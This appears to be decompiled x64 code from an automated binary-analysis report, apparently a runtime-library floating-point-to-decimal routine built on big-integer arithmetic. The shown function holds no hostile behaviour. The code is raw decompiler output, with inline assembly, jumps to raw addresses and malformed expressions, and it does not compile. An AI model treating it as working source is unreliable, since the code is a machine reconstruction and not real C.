                                                                      • Opcode ID: 61e22ce612ef22a5f2d07340a2d590d4ffa2e50b7a2f703c57b57c8b762e5036
                                                                      • Instruction ID: b7c4b4a0c11f1ed0e88ced55b0931d10f857eddd2f249f208b085b4db63504a6
                                                                      • Opcode Fuzzy Hash: 61e22ce612ef22a5f2d07340a2d590d4ffa2e50b7a2f703c57b57c8b762e5036
                                                                      • Instruction Fuzzy Hash: 89E1A272204A888AE7B6CF25D484BD977A4F78DBCCF529415EB0987B84DB35CB09CB44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 89%
                                                                      			E0000000118004BE14(intOrPtr __ebx, signed int __ecx, signed int __edx, long long __rbx, signed int __r9, signed int __r10) {
                                                                      				void* __rsi;
                                                                      				void* __r13;
                                                                      				void* _t480;
                                                                      				signed long long _t508;
                                                                      				signed long long _t517;
                                                                      				unsigned int _t529;
                                                                      				intOrPtr _t536;
                                                                      				signed long long _t563;
                                                                      				unsigned int _t568;
                                                                      				intOrPtr _t575;
                                                                      				signed long long _t602;
                                                                      				void* _t609;
                                                                      				void* _t613;
                                                                      				signed int _t625;
                                                                      				signed int _t630;
                                                                      				signed int _t631;
                                                                      				signed long long _t634;
                                                                      				intOrPtr _t637;
                                                                      				signed int _t640;
                                                                      				signed long long _t669;
                                                                      				signed int _t676;
                                                                      				signed long long _t681;
                                                                      				intOrPtr _t686;
                                                                      				signed long long _t687;
                                                                      				char _t690;
                                                                      				signed int _t693;
                                                                      				signed int _t699;
                                                                      				signed int _t705;
                                                                      				signed int _t747;
                                                                      				intOrPtr _t761;
                                                                      				void* _t764;
                                                                      				void* _t765;
                                                                      				void* _t780;
                                                                      				void* _t789;
                                                                      				void* _t802;
                                                                      				void* _t810;
                                                                      				void* _t851;
                                                                      				void* _t891;
                                                                      				signed long long _t925;
                                                                      				signed long long _t935;
                                                                      				void* _t937;
                                                                      				signed long long _t947;
                                                                      				signed int _t948;
                                                                      				signed long long _t949;
                                                                      				void* _t954;
                                                                      				signed int* _t955;
                                                                      				signed long long _t959;
                                                                      				signed long long _t962;
                                                                      				long long _t972;
                                                                      				signed long long _t976;
                                                                      				signed long long _t978;
                                                                      				long long _t988;
                                                                      				void* _t1003;
                                                                      				unsigned long long _t1006;
                                                                      				signed long long _t1007;
                                                                      				void* _t1011;
                                                                      				signed long long _t1014;
                                                                      				signed long long _t1018;
                                                                      				void* _t1020;
                                                                      				void* _t1023;
                                                                      				long long _t1026;
                                                                      				signed long long _t1030;
                                                                      				signed long long _t1032;
                                                                      				signed long long _t1033;
                                                                      				void* _t1034;
                                                                      				signed long long _t1035;
                                                                      				void* _t1037;
                                                                      				signed long long _t1039;
                                                                      				char* _t1043;
                                                                      				void* _t1045;
                                                                      				void* _t1046;
                                                                      				void* _t1048;
                                                                      				signed long long _t1049;
                                                                      				signed long long _t1053;
                                                                      				signed long long _t1054;
                                                                      				signed long long _t1066;
                                                                      				signed long long _t1067;
                                                                      				signed long long _t1080;
                                                                      				signed long long _t1081;
                                                                      				signed long long _t1095;
                                                                      				void* _t1105;
                                                                      				void* _t1107;
                                                                      				void* _t1113;
                                                                      				void* _t1115;
                                                                      
                                                                      				_t1095 = __r9;
                                                                      				_t640 = __ecx;
                                                                      				 *((long long*)(_t1048 + 0x18)) = __rbx;
                                                                      				_t1046 = _t1048 - 0x6c0;
                                                                      				_t1049 = _t1048 - 0x7c0;
                                                                      				_t925 =  *0x80072078; // 0xc949cbcab002
                                                                      				 *(_t1046 + 0x6b0) = _t925 ^ _t1049;
                                                                      				 *((long long*)(_t1049 + 0x48)) =  *((intOrPtr*)(_t1046 + 0x720));
                                                                      				 *((long long*)(_t1049 + 0x60)) =  *((intOrPtr*)(_t1046 + 0x728));
                                                                      				 *(_t1049 + 0x44) = r8d;
                                                                      				 *((intOrPtr*)(_t1049 + 0x40)) = __edx;
                                                                      				asm("movsd [esp+0x38], xmm0");
                                                                      				_t1006 =  *((intOrPtr*)(_t1049 + 0x38));
                                                                      				 *((long long*)(_t1049 + 0x58)) = __r9;
                                                                      				r9d = 0x7ff;
                                                                      				asm("dec eax");
                                                                      				_t1007 = _t1006 & 0xffffffff;
                                                                      				_t959 =  ~(_t1006 >> 0x00000034 & __r9);
                                                                      				asm("sbb eax, eax");
                                                                      				r8d = r8d & r9d;
                                                                      				E00000001180058B1C(E00000001180058BE0(_t480, 0xffffffff), _t1006 >> 0x34);
                                                                      				asm("cvttsd2si ecx, xmm0");
                                                                      				 *((intOrPtr*)(_t1049 + 0x74)) = __ebx;
                                                                      				_t14 = _t1039 - 1; // 0x1
                                                                      				r12d = _t14;
                                                                      				asm("inc ebp");
                                                                      				r13d = r13d & _t640;
                                                                      				 *((intOrPtr*)(_t1049 + 0x78)) = __ebx;
                                                                      				 *(_t1049 + 0x20) = r13d;
                                                                      				asm("sbb edx, edx");
                                                                      				r14d = 0;
                                                                      				_t693 =  ~__edx + r12d;
                                                                      				 *(_t1049 + 0x70) = _t693;
                                                                      				if (_t1039 + 0xffffffff + r8d - 0x434 < 0) goto 0x8004c159;
                                                                      				 *((intOrPtr*)(_t1046 + 0x318)) = 0x100000;
                                                                      				 *((intOrPtr*)(_t1046 + 0x314)) = 0;
                                                                      				 *(_t1046 + 0x310) = 2;
                                                                      				if (__ebx == 0) goto 0x8004c055;
                                                                      				r8d = r14d;
                                                                      				if ( *((intOrPtr*)(_t1046 + 0x314 + _t959 * 4)) !=  *((intOrPtr*)(_t1049 + 0x74 + _t959 * 4))) goto 0x8004c055;
                                                                      				r8d = r8d + r12d;
                                                                      				_t780 = r8d - 2;
                                                                      				if (_t780 != 0) goto 0x8004bf36;
                                                                      				r11d = _t1035 - 0x432;
                                                                      				 *(_t1049 + 0x28) = r14d;
                                                                      				r9d = r11d;
                                                                      				r8d = 0x20;
                                                                      				r11d = r11d & 0x0000001f;
                                                                      				r9d = r9d >> 5;
                                                                      				_t630 = __ebx - r12d;
                                                                      				asm("bsr eax, [esp+eax*4+0x74]");
                                                                      				r12d = _t630;
                                                                      				r12d =  !r12d;
                                                                      				if (_t780 == 0) goto 0x8004bf94;
                                                                      				goto 0x8004bf97;
                                                                      				r8d = r8d - r14d;
                                                                      				if (_t1007 + _t1095 - 0x73 > 0) goto 0x8004c031;
                                                                      				r15d = r14d;
                                                                      				r15b = r11d - r8d > 0;
                                                                      				r15d = r15d + _t693;
                                                                      				r15d = r15d + r9d;
                                                                      				if (r15d - 0x73 > 0) goto 0x8004c031;
                                                                      				_t764 = _t1095 - 1;
                                                                      				_t33 = _t1115 - 1; // -1
                                                                      				r10d = _t33;
                                                                      				if (r10d == _t764) goto 0x8004c014;
                                                                      				if (r10d - r9d - _t693 >= 0) goto 0x8004bfde;
                                                                      				r8d =  *(_t1049 + 0x40000000000070);
                                                                      				goto 0x8004bfe1;
                                                                      				r8d = r14d;
                                                                      				if (0xffffffffffffe - _t693 >= 0) goto 0x8004bfeb;
                                                                      				goto 0x8004bfee;
                                                                      				r8d = r8d & _t630;
                                                                      				r8d = r8d << r11d;
                                                                      				 *(_t1049 + 0x74 + __r10 * 4) = (r14d & r12d) >> r8d - r11d | r8d;
                                                                      				r10d = r10d - 1;
                                                                      				if (r10d == _t764) goto 0x8004c014;
                                                                      				_t699 =  *(_t1049 + 0x70);
                                                                      				goto 0x8004bfca;
                                                                      				if (r9d == 0) goto 0x8004c02a;
                                                                      				 *(_t1049 + 0x40000000000070) = r14d;
                                                                      				_t789 = r14d + 1 - r9d;
                                                                      				if (_t789 != 0) goto 0x8004c01c;
                                                                      				 *(_t1049 + 0x70) = r15d;
                                                                      				goto 0x8004c039;
                                                                      				r15d = r14d;
                                                                      				 *(_t1049 + 0x70) = r14d;
                                                                      				r12d = 1;
                                                                      				 *(_t1046 + 0x144) = 4;
                                                                      				 *(_t1046 + 0x140) = r12d;
                                                                      				goto 0x8004c39d;
                                                                      				r11d = _t1035 - 0x433;
                                                                      				 *(_t1049 + 0x28) = r14d;
                                                                      				r9d = r11d;
                                                                      				r8d = 0x20;
                                                                      				r11d = r11d & 0x0000001f;
                                                                      				r9d = r9d >> 5;
                                                                      				_t747 = r8d - r11d;
                                                                      				_t631 = _t630 - r12d;
                                                                      				asm("bsr eax, [esp+eax*4+0x74]");
                                                                      				r12d = _t631;
                                                                      				r12d =  !r12d;
                                                                      				if (_t789 == 0) goto 0x8004c097;
                                                                      				goto 0x8004c09a;
                                                                      				r8d = r8d - r14d;
                                                                      				if (_t1007 + _t1095 - 0x73 > 0) goto 0x8004c139;
                                                                      				r15d = r14d;
                                                                      				r15b = r11d - r8d > 0;
                                                                      				r15d = r15d + _t699;
                                                                      				r15d = r15d + r9d;
                                                                      				if (r15d - 0x73 > 0) goto 0x8004c139;
                                                                      				_t765 = _t1095 - 1;
                                                                      				_t57 = _t1115 - 1; // -1
                                                                      				r10d = _t57;
                                                                      				if (r10d == _t765) goto 0x8004c117;
                                                                      				if (r10d - r9d - _t699 >= 0) goto 0x8004c0e1;
                                                                      				r8d =  *(_t1049 + 0x40000000000070);
                                                                      				goto 0x8004c0e4;
                                                                      				r8d = r14d;
                                                                      				if (0xffffffffffffe - _t699 >= 0) goto 0x8004c0ee;
                                                                      				goto 0x8004c0f1;
                                                                      				r8d = r8d & _t631;
                                                                      				r8d = r8d << r11d;
                                                                      				 *(_t1049 + 0x74 + __r10 * 4) = (r14d & r12d) >> _t747 | r8d;
                                                                      				r10d = r10d - 1;
                                                                      				if (r10d == _t765) goto 0x8004c117;
                                                                      				_t705 =  *(_t1049 + 0x70);
                                                                      				goto 0x8004c0cd;
                                                                      				if (r9d == 0) goto 0x8004c12d;
                                                                      				 *(_t1049 + 0x40000000000070) = r14d;
                                                                      				if (r14d + 1 != r9d) goto 0x8004c11f;
                                                                      				 *(_t1049 + 0x70) = r15d;
                                                                      				goto 0x8004c141;
                                                                      				r15d = r14d;
                                                                      				 *(_t1049 + 0x70) = r14d;
                                                                      				r12d = 1;
                                                                      				 *(_t1046 + 0x144) = 2;
                                                                      				 *(_t1046 + 0x140) = r12d;
                                                                      				goto 0x8004c39d;
                                                                      				if (_t747 == 0x36) goto 0x8004c2ad;
                                                                      				 *((intOrPtr*)(_t1046 + 0x318)) = 0x100000;
                                                                      				 *((intOrPtr*)(_t1046 + 0x314)) = 0;
                                                                      				 *(_t1046 + 0x310) = 2;
                                                                      				if (_t631 == 0) goto 0x8004c2ad;
                                                                      				r8d = r14d;
                                                                      				if ( *((intOrPtr*)(_t1046 + 0x314 + _t959 * 4)) !=  *((intOrPtr*)(_t1049 + 0x74 + _t959 * 4))) goto 0x8004c2ad;
                                                                      				r8d = r8d + r12d;
                                                                      				_t802 = r8d - 2;
                                                                      				if (_t802 != 0) goto 0x8004c185;
                                                                      				asm("bsr eax, ebx");
                                                                      				 *(_t1049 + 0x28) = r14d;
                                                                      				if (_t802 == 0) goto 0x8004c1af;
                                                                      				goto 0x8004c1b2;
                                                                      				r15d = r14d;
                                                                      				r8d = 0x20;
                                                                      				r8d = r8d - r14d;
                                                                      				r15b = r8d - 2 > 0;
                                                                      				r11d = r11d | 0xffffffff;
                                                                      				r15d = r15d + _t705;
                                                                      				if (r15d - 0x73 <= 0) goto 0x8004c1dc;
                                                                      				r15d = r14d;
                                                                      				 *(_t1049 + 0x70) = r14d;
                                                                      				goto 0x8004c22e;
                                                                      				_t87 = _t1115 - 1; // -1
                                                                      				_t508 = _t87;
                                                                      				if (_t508 == r11d) goto 0x8004c229;
                                                                      				r10d = _t508;
                                                                      				r8d = 0xffffffffffffe;
                                                                      				if (_t508 - _t705 >= 0) goto 0x8004c1f7;
                                                                      				r9d =  *(_t1049 + 0x74 + __r10 * 4);
                                                                      				goto 0x8004c1fa;
                                                                      				r9d = r14d;
                                                                      				if (r8d - _t705 >= 0) goto 0x8004c206;
                                                                      				goto 0x8004c209;
                                                                      				 *(_t1049 + 0x74 + __r10 * 4) = r14d >> 0x0000001e | _t1095 * 0x00000004;
                                                                      				if (r8d == r11d) goto 0x8004c229;
                                                                      				goto 0x8004c1e5;
                                                                      				 *(_t1049 + 0x70) = r15d;
                                                                      				_t947 = _t1035 * 4;
                                                                      				_t1053 = _t947;
                                                                      				E000000011800051C0(r8d, 0, _t1046 + 0x314, _t1007, _t1053);
                                                                      				 *(_t1046 + _t947 + 0x314) = r12d << sil;
                                                                      				_t105 = _t1035 + 1; // 0x437
                                                                      				r12d = _t105;
                                                                      				r8d = r12d;
                                                                      				_t1054 = _t1053 << 2;
                                                                      				 *(_t1046 + 0x310) = r12d;
                                                                      				 *(_t1046 + 0x140) = r12d;
                                                                      				if (_t1054 == 0) goto 0x8004c39d;
                                                                      				_t810 = _t1054 - _t947;
                                                                      				if (_t810 > 0) goto 0x8004c37c;
                                                                      				E00000001180004B10();
                                                                      				goto 0x8004c396;
                                                                      				 *(_t1049 + 0x28) = r14d;
                                                                      				asm("dec eax");
                                                                      				asm("bsr eax, [esp+eax+0x74]");
                                                                      				if (_t810 == 0) goto 0x8004c2c5;
                                                                      				goto 0x8004c2c8;
                                                                      				r15d = r14d;
                                                                      				r8d = 0x20;
                                                                      				r8d = r8d - r14d;
                                                                      				r15b = r8d - r12d > 0;
                                                                      				r11d = r11d | 0xffffffff;
                                                                      				r15d = r15d;
                                                                      				if (r15d - 0x73 <= 0) goto 0x8004c2f2;
                                                                      				r15d = r14d;
                                                                      				 *(_t1049 + 0x70) = r14d;
                                                                      				goto 0x8004c340;
                                                                      				_t112 = _t1115 - 1; // -1
                                                                      				_t517 = _t112;
                                                                      				if (_t517 == r11d) goto 0x8004c33b;
                                                                      				r10d = _t517;
                                                                      				r8d = 0xffffffffffffe;
                                                                      				if (_t517 >= 0) goto 0x8004c30d;
                                                                      				r9d =  *(_t1049 + 0x74 + __r10 * 4);
                                                                      				goto 0x8004c310;
                                                                      				r9d = r14d;
                                                                      				if (r8d >= 0) goto 0x8004c31c;
                                                                      				goto 0x8004c31f;
                                                                      				 *(_t1049 + 0x74 + __r10 * 4) = r14d >> 0x0000001f | _t1095 + _t1095;
                                                                      				if (r8d == r11d) goto 0x8004c33b;
                                                                      				goto 0x8004c2fb;
                                                                      				 *(_t1049 + 0x70) = r15d;
                                                                      				_t962 = _t1046 + 0x314;
                                                                      				_t948 = _t1035 * 4;
                                                                      				E000000011800051C0(r8d, 0, _t962, _t1046 + 0x314, _t948);
                                                                      				 *(_t1046 + _t948 + 0x314) = r12d << sil;
                                                                      				goto 0x8004c265;
                                                                      				E000000011800051C0(r12d << sil, 0, _t962, _t1046 + 0x314, _t948);
                                                                      				E0000000118003BFFC(r8d - r11d, 0xffffffff);
                                                                      				 *0xffffffff = 0x22;
                                                                      				E0000000118003A794();
                                                                      				r12d =  *(_t1046 + 0x140);
                                                                      				if (r13d < 0) goto 0x8004c848;
                                                                      				_t529 = 0xcccccccd * r13d >> 0x20 >> 3;
                                                                      				 *(_t1049 + 0x34) = _t529;
                                                                      				 *(_t1049 + 0x24) = _t529;
                                                                      				if (_t529 == 0) goto 0x8004c79b;
                                                                      				_t531 =  >  ? 0x26 : _t529;
                                                                      				 *(_t1049 + 0x30) =  >  ? 0x26 : _t529;
                                                                      				_t949 = _t962 * 4;
                                                                      				 *(_t1046 + 0x310) = _t1039 + _t962;
                                                                      				E000000011800051C0(_t1039 + _t962, 0, _t1046 + 0x314, _t1046 + 0x314, _t949);
                                                                      				E00000001180004B10();
                                                                      				r10d =  *(_t1046 + 0x310);
                                                                      				if (r10d - 1 > 0) goto 0x8004c4ae;
                                                                      				_t536 =  *((intOrPtr*)(_t1046 + 0x314));
                                                                      				if (_t536 != 0) goto 0x8004c464;
                                                                      				r12d = r14d;
                                                                      				 *(_t1046 + 0x140) = r14d;
                                                                      				goto 0x8004c59e;
                                                                      				if (_t536 == 1) goto 0x8004c59e;
                                                                      				if (r12d == 0) goto 0x8004c59e;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r12d) goto 0x8004c47f;
                                                                      				goto 0x8004c559;
                                                                      				if (r12d - 1 > 0) goto 0x8004c5bb;
                                                                      				_t634 =  *(_t1046 + 0x144);
                                                                      				r12d = r10d;
                                                                      				 *(_t1046 + 0x140) = r10d;
                                                                      				if (0xffffffff << 2 == 0) goto 0x8004c514;
                                                                      				if (0xffffffff << 2 - 0xffffffff > 0) goto 0x8004c4f3;
                                                                      				_t1011 = _t1046 + 0x314;
                                                                      				E00000001180004B10();
                                                                      				goto 0x8004c50d;
                                                                      				E000000011800051C0(0x1cc, 0, _t1046 + 0x144, _t1011, 0xffffffff);
                                                                      				E0000000118003BFFC(0xffffffff << 2 - 0xffffffff, 0xffffffff);
                                                                      				 *0xffffffff = 0x22;
                                                                      				E0000000118003A794();
                                                                      				r12d =  *(_t1046 + 0x140);
                                                                      				if (_t634 == 0) goto 0x8004c455;
                                                                      				if (_t634 == 1) goto 0x8004c59e;
                                                                      				if (r12d == 0) goto 0x8004c59e;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r12d) goto 0x8004c52f;
                                                                      				if (r8d == 0) goto 0x8004c597;
                                                                      				if ( *(_t1046 + 0x140) - 0x73 >= 0) goto 0x8004c588;
                                                                      				 *(_t1046 + 0x40000000000140) = r8d;
                                                                      				r12d =  *(_t1046 + 0x140);
                                                                      				r12d = r12d + 1;
                                                                      				 *(_t1046 + 0x140) = r12d;
                                                                      				goto 0x8004c59e;
                                                                      				 *(_t1046 + 0x140) = r14d;
                                                                      				r12d = r14d;
                                                                      				goto 0x8004c5a0;
                                                                      				r12d =  *(_t1046 + 0x140);
                                                                      				if (1 != 0) goto 0x8004c780;
                                                                      				r12d = r14d;
                                                                      				 *(_t1046 + 0x140) = r14d;
                                                                      				goto 0x8004cc95;
                                                                      				 *(_t1046 + 0x4e0) = r14d;
                                                                      				r13d = r12d;
                                                                      				r13d =  <  ? r10d : r13d;
                                                                      				_t972 =  >=  ? _t1046 + 0x144 : _t1046 + 0x314;
                                                                      				_t1066 = _t1046 + 0x314;
                                                                      				 *((long long*)(_t1049 + 0x38)) = _t972;
                                                                      				r9d = r14d;
                                                                      				_t1014 =  >=  ? _t1066 : _t1046 + 0x144;
                                                                      				 *(_t1049 + 0x28) = _t1014;
                                                                      				r10d =  !=  ? r12d : r10d;
                                                                      				r12d = r14d;
                                                                      				if (r13d == 0) goto 0x8004c726;
                                                                      				if ( *((intOrPtr*)(_t972 + 0x3ffffffffffffc)) != 0) goto 0x8004c63d;
                                                                      				if (r9d != r12d) goto 0x8004c71a;
                                                                      				_t197 = _t1095 + 1; // 0x1
                                                                      				r12d = _t197;
                                                                      				 *(_t1046 + 0x400000000004e0) = r14d;
                                                                      				 *(_t1046 + 0x4e0) = r12d;
                                                                      				goto 0x8004c71a;
                                                                      				r11d = r14d;
                                                                      				r8d = r9d;
                                                                      				if (r10d == 0) goto 0x8004c706;
                                                                      				if (r8d == 0x73) goto 0x8004c6b4;
                                                                      				if (r8d != r12d) goto 0x8004c671;
                                                                      				_t202 = _t1066 + 1; // 0x1
                                                                      				 *(_t1046 + 0x4e4 + _t1035 * 4) = r14d;
                                                                      				 *(_t1046 + 0x4e0) = _t202;
                                                                      				r8d = r8d + 1;
                                                                      				 *(_t1046 + 0x4e4 + _t1035 * 4) =  *(_t1014 + 0x3ffffffffffffc);
                                                                      				r12d =  *(_t1046 + 0x4e0);
                                                                      				if (_t1066 + _t949 == r10d) goto 0x8004c6b4;
                                                                      				_t1018 =  *(_t1049 + 0x28);
                                                                      				goto 0x8004c651;
                                                                      				if (r11d == 0) goto 0x8004c706;
                                                                      				if (r8d == 0x73) goto 0x8004c5a8;
                                                                      				if (r8d != r12d) goto 0x8004c6dd;
                                                                      				_t219 = _t1066 + 1; // 0x1
                                                                      				 *(_t1046 + 0x4e4 + _t1018 * 4) = r14d;
                                                                      				 *(_t1046 + 0x4e0) = _t219;
                                                                      				r8d = r8d + 1;
                                                                      				_t669 = r11d;
                                                                      				 *(_t1046 + 0x4e4 + _t1018 * 4) = _t669;
                                                                      				r12d =  *(_t1046 + 0x4e0);
                                                                      				r11d = _t669;
                                                                      				if (_t669 != 0) goto 0x8004c6b9;
                                                                      				if (r8d == 0x73) goto 0x8004c5a8;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r13d) goto 0x8004c612;
                                                                      				r8d = r12d;
                                                                      				_t1067 = _t1066 << 2;
                                                                      				 *(_t1046 + 0x140) = r12d;
                                                                      				if (_t1067 == 0) goto 0x8004c779;
                                                                      				_t976 = _t1046 + 0x144;
                                                                      				_t851 = _t1067 - 0xffffffff;
                                                                      				if (_t851 > 0) goto 0x8004c758;
                                                                      				_t1020 = _t1046 + 0x4e4;
                                                                      				E00000001180004B10();
                                                                      				goto 0x8004c772;
                                                                      				E000000011800051C0(0x1cc, 0, _t976, _t1020, 0xffffffff);
                                                                      				E0000000118003BFFC(_t851, 0xffffffff);
                                                                      				 *0xffffffff = 0x22;
                                                                      				E0000000118003A794();
                                                                      				r12d =  *(_t1046 + 0x140);
                                                                      				 *(_t1049 + 0x24) =  *(_t1049 + 0x24) -  *(_t1049 + 0x30);
                                                                      				if (_t851 != 0) goto 0x8004c3d1;
                                                                      				if (_t851 == 0) goto 0x8004cc95;
                                                                      				_t563 =  *0x40000180063A44;
                                                                      				if (_t563 == 0) goto 0x8004c5ac;
                                                                      				if (_t563 == 1) goto 0x8004cc95;
                                                                      				if (r12d == 0) goto 0x8004cc95;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r10d = _t563;
                                                                      				r9d = r9d + 1;
                                                                      				_t978 = _t976 * _t949 + 0xffffffff;
                                                                      				if (r9d != r12d) goto 0x8004c7dc;
                                                                      				if (r8d == 0) goto 0x8004c83c;
                                                                      				if ( *(_t1046 + 0x140) - 0x73 >= 0) goto 0x8004c5ac;
                                                                      				 *(_t1046 + 0x40000000000140) = r8d;
                                                                      				r12d =  *(_t1046 + 0x140);
                                                                      				r12d = r12d + 1;
                                                                      				 *(_t1046 + 0x140) = r12d;
                                                                      				goto 0x8004cc95;
                                                                      				r12d =  *(_t1046 + 0x140);
                                                                      				goto 0x8004cc95;
                                                                      				_t676 =  ~r13d;
                                                                      				 *(_t1049 + 0x30) = _t676;
                                                                      				_t568 =  *(_t1046 + 0x140) * _t676 >> 0x20 >> 3;
                                                                      				 *(_t1049 + 0x28) = _t568;
                                                                      				 *(_t1049 + 0x24) = _t568;
                                                                      				if (_t568 == 0) goto 0x8004cc18;
                                                                      				_t570 =  >  ? 0x26 : _t568;
                                                                      				 *(_t1049 + 0x34) =  >  ? 0x26 : _t568;
                                                                      				_t950 = _t978 * 4;
                                                                      				 *(_t1046 + 0x310) = (_t1039 << 2) + _t978;
                                                                      				E000000011800051C0((_t1039 << 2) + _t978, 0, _t1046 + 0x314, _t1020, _t978 * 4);
                                                                      				E00000001180004B10();
                                                                      				r10d =  *(_t1046 + 0x310);
                                                                      				if (r10d - 1 > 0) goto 0x8004c94b;
                                                                      				_t575 =  *((intOrPtr*)(_t1046 + 0x314));
                                                                      				if (_t575 != 0) goto 0x8004c907;
                                                                      				r15d = r14d;
                                                                      				 *(_t1049 + 0x70) = r14d;
                                                                      				goto 0x8004ca1e;
                                                                      				if (_t575 == 1) goto 0x8004ca1e;
                                                                      				if (r15d == 0) goto 0x8004ca1e;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r15d) goto 0x8004c922;
                                                                      				goto 0x8004c9e8;
                                                                      				if (r15d - 1 > 0) goto 0x8004ca3e;
                                                                      				_t637 =  *((intOrPtr*)(_t1049 + 0x74));
                                                                      				r15d = r10d;
                                                                      				 *(_t1049 + 0x70) = r10d;
                                                                      				if (0xffffffff << 2 == 0) goto 0x8004c9a9;
                                                                      				if (0xffffffff << 2 - 0xffffffff > 0) goto 0x8004c98a;
                                                                      				_t1023 = _t1046 + 0x314;
                                                                      				E00000001180004B10();
                                                                      				goto 0x8004c9a4;
                                                                      				E000000011800051C0(0x1cc, 0, _t1049 + 0x74, _t1023, 0xffffffff);
                                                                      				E0000000118003BFFC(0xffffffff << 2 - 0xffffffff, 0xffffffff);
                                                                      				 *0xffffffff = 0x22;
                                                                      				E0000000118003A794();
                                                                      				r15d =  *(_t1049 + 0x70);
                                                                      				if (_t637 == 0) goto 0x8004c8fa;
                                                                      				if (_t637 == 1) goto 0x8004ca1e;
                                                                      				if (r15d == 0) goto 0x8004ca1e;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r15d) goto 0x8004c9c4;
                                                                      				if (r8d == 0) goto 0x8004ca19;
                                                                      				if ( *(_t1049 + 0x70) - 0x73 >= 0) goto 0x8004ca0c;
                                                                      				 *(_t1049 + 0x40000000000070) = r8d;
                                                                      				r15d =  *(_t1049 + 0x70);
                                                                      				r15d = r15d + 1;
                                                                      				 *(_t1049 + 0x70) = r15d;
                                                                      				goto 0x8004ca1e;
                                                                      				 *(_t1049 + 0x70) = r14d;
                                                                      				r15d = r14d;
                                                                      				goto 0x8004ca20;
                                                                      				r15d =  *(_t1049 + 0x70);
                                                                      				if (1 != 0) goto 0x8004cbf9;
                                                                      				 *(_t1049 + 0x70) = r14d;
                                                                      				goto 0x8004cd12;
                                                                      				 *(_t1046 + 0x4e0) = r14d;
                                                                      				r13d = r15d;
                                                                      				r13d =  <  ? r10d : r13d;
                                                                      				_t988 =  >=  ? _t1049 + 0x74 : _t1046 + 0x314;
                                                                      				_t1080 = _t1046 + 0x314;
                                                                      				 *((long long*)(_t1049 + 0x50)) = _t988;
                                                                      				r9d = r14d;
                                                                      				_t1026 =  >=  ? _t1080 : _t1049 + 0x74;
                                                                      				 *((long long*)(_t1049 + 0x38)) = _t1026;
                                                                      				r10d =  !=  ? r15d : r10d;
                                                                      				r15d = r14d;
                                                                      				if (r13d == 0) goto 0x8004cba5;
                                                                      				if ( *((intOrPtr*)(_t988 + 0x3ffffffffffffc)) != 0) goto 0x8004cabc;
                                                                      				if (r9d != r15d) goto 0x8004cb99;
                                                                      				_t331 = _t1095 + 1; // 0x1
                                                                      				r15d = _t331;
                                                                      				 *(_t1046 + 0x400000000004e0) = r14d;
                                                                      				 *(_t1046 + 0x4e0) = r15d;
                                                                      				goto 0x8004cb99;
                                                                      				r11d = r14d;
                                                                      				r8d = r9d;
                                                                      				if (r10d == 0) goto 0x8004cb85;
                                                                      				if (r8d == 0x73) goto 0x8004cb33;
                                                                      				if (r8d != r15d) goto 0x8004caf0;
                                                                      				_t336 = _t1080 + 1; // 0x1
                                                                      				 *(_t1046 + 0x4e4 + _t1035 * 4) = r14d;
                                                                      				 *(_t1046 + 0x4e0) = _t336;
                                                                      				r8d = r8d + 1;
                                                                      				 *(_t1046 + 0x4e4 + _t1035 * 4) =  *(_t1026 + 0x3ffffffffffffc);
                                                                      				r15d =  *(_t1046 + 0x4e0);
                                                                      				if (_t1080 +  *((intOrPtr*)(_t1049 + 0x48)) == r10d) goto 0x8004cb33;
                                                                      				_t1030 =  *((intOrPtr*)(_t1049 + 0x38));
                                                                      				goto 0x8004cad0;
                                                                      				if (r11d == 0) goto 0x8004cb85;
                                                                      				if (r8d == 0x73) goto 0x8004ca28;
                                                                      				if (r8d != r15d) goto 0x8004cb5c;
                                                                      				_t353 = _t1080 + 1; // 0x1
                                                                      				 *(_t1046 + 0x4e4 + _t1030 * 4) = r14d;
                                                                      				 *(_t1046 + 0x4e0) = _t353;
                                                                      				r8d = r8d + 1;
                                                                      				_t681 = r11d;
                                                                      				 *(_t1046 + 0x4e4 + _t1030 * 4) = _t681;
                                                                      				r15d =  *(_t1046 + 0x4e0);
                                                                      				r11d = _t681;
                                                                      				if (_t681 != 0) goto 0x8004cb38;
                                                                      				if (r8d == 0x73) goto 0x8004ca28;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r13d) goto 0x8004ca91;
                                                                      				r8d = r15d;
                                                                      				_t1081 = _t1080 << 2;
                                                                      				 *(_t1049 + 0x70) = r15d;
                                                                      				if (_t1081 == 0) goto 0x8004cbf2;
                                                                      				_t891 = _t1081 - 0xffffffff;
                                                                      				if (_t891 > 0) goto 0x8004cbd3;
                                                                      				_t1032 = _t1046 + 0x4e4;
                                                                      				E00000001180004B10();
                                                                      				goto 0x8004cbed;
                                                                      				E000000011800051C0(0x1cc, 0, _t1049 + 0x74, _t1032, 0xffffffff);
                                                                      				E0000000118003BFFC(_t891, 0xffffffff);
                                                                      				 *0xffffffff = 0x22;
                                                                      				E0000000118003A794();
                                                                      				r15d =  *(_t1049 + 0x70);
                                                                      				 *(_t1049 + 0x24) =  *(_t1049 + 0x24) -  *(_t1049 + 0x34);
                                                                      				if (_t891 != 0) goto 0x8004c876;
                                                                      				if (_t891 == 0) goto 0x8004cc91;
                                                                      				_t602 =  *0x40000180063A44;
                                                                      				if (_t602 == 0) goto 0x8004ca28;
                                                                      				if (_t602 == 1) goto 0x8004cc91;
                                                                      				if (r15d == 0) goto 0x8004cc91;
                                                                      				r8d = r14d;
                                                                      				r9d = r14d;
                                                                      				r10d = _t602;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r15d) goto 0x8004cc47;
                                                                      				if (r8d == 0) goto 0x8004cce6;
                                                                      				if ( *(_t1049 + 0x70) - 0x73 >= 0) goto 0x8004ca28;
                                                                      				 *(_t1049 + 0x40000000000070) = r8d;
                                                                      				r15d =  *(_t1049 + 0x70);
                                                                      				r15d = r15d + 1;
                                                                      				 *(_t1049 + 0x70) = r15d;
                                                                      				_t1043 =  *((intOrPtr*)(_t1049 + 0x48));
